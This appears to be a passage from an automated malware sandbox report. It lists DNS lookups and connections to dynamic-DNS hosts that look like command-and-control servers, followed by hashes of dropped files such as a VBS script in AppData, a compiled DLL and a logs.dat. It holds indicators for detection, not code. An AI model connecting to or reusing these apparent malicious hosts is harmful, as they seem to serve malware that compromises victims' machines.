| US | 8.8.8.8:53 | 147.109.3.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | servidorwindows.ddns.com.br | udp |
| BR | 191.55.76.236:80 | servidorwindows.ddns.com.br | tcp |
| US | 8.8.8.8:53 | 236.76.55.191.in-addr.arpa | udp |
| US | 192.3.109.147:80 | 192.3.109.147 | tcp |
| US | 8.8.8.8:53 | serversw.duckdns.org | udp |
| US | 135.148.195.248:6875 | serversw.duckdns.org | tcp |
| US | 135.148.195.248:6875 | serversw.duckdns.org | tcp |
| US | 8.8.8.8:53 | geoplugin.net | udp |
| NL | 178.237.33.50:80 | geoplugin.net | tcp |
| US | 8.8.8.8:53 | 248.195.148.135.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.33.237.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.73.42.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kfavyy3o.r34.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
\??\c:\Users\Admin\AppData\Local\Temp\1gtdujx5\1gtdujx5.cmdline
| MD5 | d311574d03b4993f3aa304bf67f96925 |
| SHA1 | 0b7e49c32256f080a00f24e2d52d51bd3429c755 |
| SHA256 | 8abe2889091a1281271e0f0cdbd195ba6022a1968378bb94426297204ca5231e |
| SHA512 | ac85d204e35d976ada09768dd8eb15504acdcece6b5dc29e278ee9a391baab6928b6b1293a001f8013d05951479179ad5b6767db5f8b27205d66ad2ee53bca9f |
\??\c:\Users\Admin\AppData\Local\Temp\1gtdujx5\1gtdujx5.0.cs
| MD5 | 4e9de40112f74a35c04e70ff765bd2d9 |
| SHA1 | e1b87ff8213b319bd6dc8a34c6753a0891b080c3 |
| SHA256 | 1f50f29e22249d0a44023ab9bf900cfb9749cb222541f6fe7b81a9eebc971dfc |
| SHA512 | bf910e45a2fa3fc6790dd7a3b930fd2b24964af2e3cbd049df1da73ad271967731c7b8a8f29d89d542071a80e0388c0e12130b24d606a55da955f838effa931e |
\??\c:\Users\Admin\AppData\Local\Temp\1gtdujx5\CSC753D5C0F1284F02B1C3A2396961AB97.TMP
| MD5 | 5924f990e71212f415e3e338178170bc |
| SHA1 | a8f929db905e7485007a0b4b5ddd9be2e79e9fc0 |
| SHA256 | 0b24bb8764b1e2e124a9f5516e8d3c3636637630e385d1015ab19f5471722cbc |
| SHA512 | 82f2e5644e54c1de15b0067d1c33ba13c488cb3745c7d1631d34ab8cc13ea74f3d5fd4592ba9af44853b71889116ad5c4c2c478d9358ef6859ead85275025132 |
C:\Users\Admin\AppData\Local\Temp\RESD254.tmp
| MD5 | 22b4ec34e2980d63c25653b1e40ac744 |
| SHA1 | 542ebfffb86efe581bc6887c51e06eed1f2a58c5 |
| SHA256 | d4332a4049a41dd4049e61450096e5d30dbbf35763625766eca8fa2c64896706 |
| SHA512 | e7f9b662bc5682e257d7e2765177ac5729cee6560f1a29cb123f3863279ad0f66c511b33e5c28591d0415cbcbd48f6793fbda9bf271aec58bb0e8e5292d88f45 |
C:\Users\Admin\AppData\Local\Temp\1gtdujx5\1gtdujx5.dll
| MD5 | 1a35ca085bc3e8776a10ab629fbfea4f |
| SHA1 | 1ae0f49eeee4c3d571c1ba9464ec9d7c914a9f83 |
| SHA256 | e11fe36cd48c3d56ea6705f9815f81601f65beee880b0ed8bf8e512baaef5aa7 |
| SHA512 | 3ff04c6ca3c31776126febba715b6d040b3fd378a62e41ae62217fb67622f1af18548acf4e3c74f935a737961d382951c2067a848ae7e4dff684bef4d73628a0 |
C:\Users\Admin\AppData\Roaming\seatforagirlfriendwhokissflowerwa.vBS
| MD5 | bbb5526e4329ba09ff5e50938cacf20f |
| SHA1 | 3ad1ef94e2ffbe311f3d9017c2f3781d00869951 |
| SHA256 | 700af46841a34b035ee7431fd07fe6bbd13651c58a704aed14df47cd74ce76ac |
| SHA512 | 5919fa788df8b2398078be672ea05a97fa273a4a0dceb8f96d5ba53b336567aeb7132a11ce99ecac7d763c1cb8ddfd2fefaf9607d74885b5927bcaf5de4b4d14 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 9faf6f9cd1992cdebfd8e34b48ea9330 |
| SHA1 | ae792d2551c6b4ad5f3fa5585c0b0d911c9f868e |
| SHA256 | 0c45700b2e83b229e25383569b85ddc0107450c43443a11633b53daf1aaed953 |
| SHA512 | 05b34627f348b2973455691bcb7131e4a5236cfece653d22432746ccd14d211b9b279f0913fbd7bb150f00eb2f2c872f4f5518f3903e024699fd23c50d679e97 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 79904f66bb3ba5a30074e63af6097f48 |
| SHA1 | daadf5af84da8f2adcb90cf90aa37186ccaa7a7e |
| SHA256 | 11b5f0a0da972d12315464c0d34b0f0d913e50f66fe43e01cf8859c42b05352a |
| SHA512 | a8e256d3765edcf99c957cb31693476fb1e3b8858d8320a069840980cfe37554ce92a2fc5b31a07e1acb987e051046ead40dc1f0a3dadcdead1721c092802c5a |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 05e68ca79bb3b6107e86a167d016a4b4 |
| SHA1 | 01fb37018ad509986e1d53d8482d02b4fdf69bac |
| SHA256 | ce68d33dc71e1f9356ca12e229f848a931b66d775d01699e441523f4af4bd735 |
| SHA512 | f31dffd70904dca37ce0a68d196b60c094b1af8355910b37557b6586a46975b37bf4a530b16f750989f48413bc86d02e00b2f14210193d23e90f9a492978ff7f |
C:\Users\Admin\AppData\Local\Temp\zwogkiwmdapiaocrcpyqtwcwpd
| MD5 | 1891919175c888ce82e9bd8a047b01ad |
| SHA1 | 502a6892a5d27ecb791ac5aa6d8586944f540453 |
| SHA256 | a6c43b4e4b8681cf0ef56c49c730fa77e34dc82db0260253a3ba75039030b9ec |
| SHA512 | 8bb940050b1abf6c27db133ed446f41e108f670f361ed5102408832ce33d9b87cd0880723441f1632292eeeb0a319c4e0fac0ea659eb55ebe1130cc3e6c776a3 |
C:\Users\Admin\AppData\Local\Temp\nert\logs.dat
| MD5 | a089abc48493601dc7126b7094897b91 |
| SHA1 | 19fe730ce0196712c6aee08e24a6a5839002abda |
| SHA256 | d9ccacd2e0812c6a5e5735eeef520bcbee81d5468bb3095f029702c97eb62d92 |
| SHA512 | e1266e5a7f10d66cdb3959b853aa8159f72450b0fda088332f125c78e5abb60d81ebc797e7a6123cee4a250f8e6e20d6fe3283a30754fa1ad02ad430824c7dff |